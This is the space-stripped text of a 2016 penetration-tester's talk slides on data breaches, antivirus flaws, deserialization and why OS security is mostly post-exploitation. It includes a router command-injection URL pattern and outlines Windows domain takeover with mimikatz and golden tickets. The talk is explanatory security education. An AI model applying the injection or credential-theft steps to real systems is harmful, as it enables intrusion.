Page 1
OperatingSystemsSecurity
AndWhyIt(Mostly)Doesn'tMatter
PatrickHof-RedTeamPentestingGmbHpatrick.hof@redteam-pentesting.de
https://www.redteam-pentesting.de/
RadboudUniversity,Nijmegen,19December2016
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 2
Foundedin2004atRWTHAachenUniversity
9penetrationtesters
Conductingpenetrationtestsworld-wide
Specialisationexclusivelyonpenetrationtests
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
RedTeamPentesting,Dates&Facts
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 3
Targetsandattacker-modeldefinedinpreliminarymeeting
Conductedfromtheattacker'sperspective→Samemethodsas“badguys”
Individualisedsearchforsecurityvulnerabilities
Detaileddocumentation
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Pentest–Introduction
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 4
Ifyoulookatthesecurity-relatedheadlinesin2016,we'reprettymuchdoomed
Largedatabreaches2016(justtonameafew):Dec14th,Yahoo:Morethan1B(!)useraccounts(fromAugust2013)
Nov23rd,AdultFriendFinder:421Museraccounts
Sep2nd,Dropbox:68Museraccounts(from2012)
May17th,LinkedIn:117Museraccounts(from2012)
andthelistgoeson...1
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
DataBreaches2016
1:Source:https://www.identityforce.com/blog/2016-data-breaches
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 5
CVE-2016-5195
CVE-2016-0800
CVE-2016-3714
CVE-2015-0235
CVE-2014-6271
CVE-2014-0160
Weevenhavelogosnow!Finally,peoplewillunderstandtheseverityofthesituation!
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
BrandedSecurityVulns
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 6
Whydoweseesomanyincidents?
Thereseemtobemoresecurity-relatedincidentsthanever
Inourpentests,weusuallycanachievewhatweagreedbeforeshouldnothappen,whyisthat?
ItriedtofindthecheesiestimageIcouldget...
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
SecurityIncidentsWhereverYouLook
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 7
IDS/IPS
Trafficanalysisuptoapplicationlayer
Antivirus
Securityappliancescombiningalloftheabove
Operatingsystemssecurity(ASLR,DEP/NXetc.)
2FA
Centralizedsecurity,e.g.grouppoliciesonWindows
...
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
DefenseMechanismsAreGettingMoreAdvanced
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 8
Whenwestarted10yearsago,“pentests”werenotwidelyknown
Now,companiesareinvestingmorethaneverinITsecurity(searchfor“HotCybersecurityStocks2016”onGoogle,Idareyou)
Shouldn'tthisreducetheamountofincidents?
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
InvestmentsinITSecurityareRising
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 9
Ok,somaybethingsarenotasbadasImakeitlooklike.
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
WhysoManyIncidents?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 10
Theory:Workingasapentesteronlyshowsveryvulnerablecompanies,everyoneelseissecureandthereforedoesn'tdopentests.
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
WhysoManyIncidents?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 11
Theory:Workingasapentesteronlyshowsveryvulnerablecompanies,everyoneelseissecureandthereforedoesn'tdopentests.
Answer:No,thosewhodopentestsarerathersecurity-aware,otherwisetheywouldn'tbother.
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
WhysoManyIncidents?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 12
Theory:Themediaaregivingaskewedviewonthingsforthesakeofmakingscaryheadlinesabout“thecybers”,thereforemakingitseemworsethanitactuallyis.
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
WhysoManyIncidents?
Sowehavetogetvery,verytoughoncyberandcyberwarfare.Itisa,itisahugeproblem.Ihaveason.He's10yearsold.Hehascomputers.Heissogoodwiththesecomputers,it'sunbelievable.Thesecurityaspectofcyberisvery,verytough.–AbrahamLincoln
“”
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 13
Theory:Themediaaregivingaskewedviewonthingsforthesakeofmakingscaryheadlinesabout“thecybers”,thereforemakingitseemworsethanitactuallyis.
Answer:Mightbepartlytrue,butapartfromtheusualmediasensationalism,manyhacksarereal.Wedoseealotofvulnerablesystemsinourworkandwealsogetfeedbackfromclientsaboutbreachestheyhadthatwereneverreportedtoanyone.
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
WhysoManyIncidents?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 14
Theory:Thereissomuchmoneyinthesecurityindustrythateveryoneisinterestedinscaringpeopleintobuyingasmuch“security”aspossible.
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
WhysoManyIncidents?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 15
Theory:Thereissomuchmoneyinthesecurityindustrythateveryoneisinterestedinscaringpeopleintobuyingasmuch“security”aspossible.
Answer:Partlytrue,there'salotofveryquestionablestuffouttherethatmakesmillionsinprofits,butasIalreadysaid:wedoseealotofveryinsecuresystemsinourwork,andifyoulookattherecentsecurityresearch,othersdotoo.
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
TheSituation
Explanations?
WhysoManyIncidents?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 16
Someideaswhattherealproblemscouldbe:
Everythingisonlinethesedays,orintheprocessofgoingonline:Banking,shopping,socialinteraction...
ITismoreandmoreprevalentineverycompany,(almost)nobodyworkswithoutITortheInternet
Employeesshouldbeabletoworkfromanywhere(andbeavailable24/7),soremoteaccessisneededevenfromprivatehardware(BYOD)
Thingschangefast,companiesaretryingtokeepupwiththelatesttrends
Thereisahugemarketforcheapgadgetsandthe“InternetofThings”
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
TheRealProblems
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 17
Complexitybreedsbugs,bugsarevulnerabilitieswaitingtobeexploited
Companiesaddmorefeaturesinsteadofsecuringthealreadyavailable
Attackersareinterestedindata,notnecessarilyarootshell
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
TheRealProblems
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 18
Malvertising:Adnetworkscurrentlyhaveahugemalwareproblem
ContentDeliveryNetworks(CDN):Onehack,millionsofvictims
Hidebehindthe“bigname”whendeliveringmalware
JavaScriptbloat
March2016:The“left-padfiasco”1:2.486.696downloadsinFebruaryaloneforamodulethatleft-padsstrings!
Again:hackonedeveloper,targetloadsofapplications
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
TheRealProblems
1:http://www.haneycodes.net/npm-left-pad-have-we-forgotten-how-to-program/
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 19
MoreBuzzwords:
InternetofThings(IoT)
TheCloud
Antivirus
Smartphones
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
TheRealProblems
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 20
9.12.2016:Netgear,8modelscanbeexploitedlikeit's'99:
http://<router_IP>/cgi-bin/;COMMAND
ThisishowIexploitedmyLinksysWRT54GWi-firoutertoinstallLinux,in2002!Eventhen,commandinjectionswerealreadyawell-knownvulnerability.
Thereareexploitkitsusedbymalvertiserstoopenuphomerouterswithvulnerabilitieslikethisone.
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
Example:HomeRouters
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 21
Antivirussoftwareisoftenindistinguishablefromakernelrootkit
Embedsitselfdeeplyintothesystem,hookingkernelfunctions
CheckoutTavisOrmandy'sworkatGoogleProjectZeroExploitsforSymantecandNorton,Avast,TrendMicro...
Recentresearch(12.12.2016)byAndrewFasano:McAfeeVirusScanforLinux,10vulnerabilitiesthatcanbe
chainedtoachieveremotecommandexecutionasroot1
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
Example:Antivirus
1:https://nation.state.actor/mcafee.html
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 22
Problem:Transparentlysendingobjectsbackandforthblursthedistinctionbetweenuntrustedclientandtrustedserverforprogrammers
Oneofthenewertools(released2015):ysoserial1
ObjectInputStream.readObject()AnnotationInvocationHandler.readObject()[...]Runtime.getRuntime()InvokerTransformer.transform()Method.invoke()Runtime.exec()
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
Example:SerializationConsideredHarmful
1:https://github.com/frohoff/ysoserial
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 23
OperatingSystemsSecurity:
MostlyPostExploitationaka:wealreadygotthedata,butwhilewe'reatit...
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
WhatElse?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 24
Inmanycases:Onceyouarepartofthedomain,itisjustamatteroftimeuntilyouaredomainadmin
Getlocaluserhashes/ticketsfrommemory
Ifnotalreadydomainadmin:Accessothermachineswithcredentials/hashes/ticketsfounduntilyouhaveadomainadminaccount
Gameover,connecttodomaincontrollerandcreateforexampleagoldenticket
mimikatz1implementsallthis
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
OperatingSystemsSecurity:Windows
1:https://github.com/gentilkiwi/mimikatz
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 25
Linuxisfoundmostlyonservers
There,youhavetheusualproblem:Onlyfewinstalltheirpatchesontime→Outdatedkernel,glibcetc.
Uselocalprivilegeescalationtogetroot
Morefragmented,ratherindividualhowyoucangetaccesstomoresystems
E.g.passwordsinthe.bash_history,privateSSHkeys,weakpasswords,openshares,configfileswithcredentials...
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
OperatingSystemsSecurity:Linux
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 26
Westarttoseethatconsumersdemandsecurity,butonlywhenithurts(e.g.Ransomware)
Nobodycaresifthey'repartofabotnet,everyonecaresiftheirfamilyphotosareencrypted(orforcompanies:theirpreciousExcelreports)
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
AreWeReallyDoomed?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 27
Reducecomplexity(KISS)insteadofincreasingit
Makesecuritypartofthedevelopmentcycle
Patchyoursystemsregularly!
NoteverythingneedstobeconnectedtotheInternet
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
AreWeReallyDoomed?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter
Page 28
Thankyouforlistening!
RedTeamPentesting
PenetrationTests
We'reDoomed
WhatNow?
Explanations!
OperatingSystemsSecurity
Conclusion
Questions?
RedTeamPentestingGmbH OSSecurityAndWhyIt(Mostly)Doesn'tMatter